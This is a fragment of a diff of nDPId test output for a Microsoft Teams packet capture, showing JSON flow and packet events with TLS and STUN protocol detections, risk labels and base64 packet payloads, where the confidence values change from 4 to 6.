-00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2641,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041694219,"flow_last_seen":1587041694308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1587041694308,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041694611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041694571,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMhisAAEARcdvAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZ7QAAEARkFLAqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 
-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1587041695305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695305,"pkt":"KDc3AG3IEBMx8Tl2CABFAACMbOkAADURirVdR27NwKgBBj\/Mw2AAeJv\/AAEAXCESpEJpQfrkOEmJN4IqUAgABgAJRlkzMjpvNS9JAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/3+gDcABAAAAAIACAAUCA60OBRrDjRc1P+cP0BpsLC+QjmAKAAEPxxxZQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1587041695305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695305,"pkt":"KDc3AG3IEBMx8Tl2CABFAACM2aMAADURHftdR27NwKgBBj\/Nw3QAeFT\/AAEAXCESpEKjF0z2+O91Jw0PY1cABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/3+gDcABAAAAAIACAAUo4jart22gVLrHF0JHGaI64vA9HeAKAAEUHwvEg=="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1587041695330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB0TLUAAEARoAHAqAEGXUduzcNgP8wAYAttAQEARCESpEJpQfrkOEmJN4IqUAiAcAAEAAAABwAgAAgAAR7efFXKj4A3AAQAAAACgDYABAAAAAEACAAUlU+ROI4McMZBUuZSU8\/gWyGrdx6AKAAE+OcqVw=="} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2671,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1587041695330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMkXkAAEARWyXAqAEGXUduzcNgP8wAeAk2AAEAXCESpEL9LF5WbGc54yQwO\/cABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAU1YbVJoGA61aUBne1Qcfqud7BOGOAKAAEmnK+Jw=="} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1587041695330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB0gkYAAEARanDAqAEGXUduzcN0P80AYEblAQEARCESpEKjF0z2+O91Jw0PY1eAcAAEAAAABwAgAAgAAR7ffFXKj4A3AAQAAAACgDYABAAAAAEACAAUNbjIzLk8Htcx5rlGPdUzB6Mtkf+AKAAECmy4uA=="} 
@@ -480,13 +489,12 @@ 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2681,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041695407,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1587041695421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587041695421,"pkt":"KDc3AG3IEBMx8Tl2CABFAACYUPwAAGwRCyM0cvwVwKgBBg2Yw3QAhCaSAAEAaCESpEK59F1PLtIJs2rQCYoABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACGUfNM4ueRX8gDcABAAAAAIACAAUDNg3puCxSSnyiCvs+zLb4wfWy9WAKAAEDuovdw=="} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1587041695422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587041695422,"pkt":"KDc3AG3IEBMx8Tl2CABFAACY4AMAAG0Reyg0cvwIwKgBBg2Xw2AAhBBVAAEAaCESpEKBJ1p+KLNk2I89FPkABgAJRlkzMjpvNS9JAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACN6qKWcI9wj8gDcABAAAAAIACAAUyAS6wVT6GpHQ1gnRXe5kbQ9LDuWAKAAEokvlFA=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1587041695432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695432,"pkt":"EBMx8Tl2KDc3AG3ICABFAACA0aoAAEARtpnAqAEGNHL8CMNgDZcAbO2O\/xAAYN6qKWcI9wj8AQEARCESpEKBJ1p+KLNk2I89FPmAcAAEAAAABwAgAAgAASyFFWBYSoA3AAQAAAACgDYABAAAAAEACAAUmYtT\/sgffZE\/GPjMTGRSk5h1N+2AKAAEPqesNg=="} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2688,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1587041695433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695433,"pkt":"EBMx8Tl2KDc3AG3ICABFAACAFs8AAEARcWjAqAEGNHL8FcN0DZgAbMYz\/xAAYGUfNM4ueRX8AQEARCESpEK59F1PLtIJs2rQCYqAcAAEAAAABwAgAAgAASyKFWBYV4A3AAQAAAACgDYABAAAAAEACAAUb+d2GMvNHhGxBtT1sjJNLSVYAvSAKAAEqoFJXQ=="} 
-00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2696,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZh4AAEARkejAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} 
00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMyucAAEARLR\/AqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041695611} 
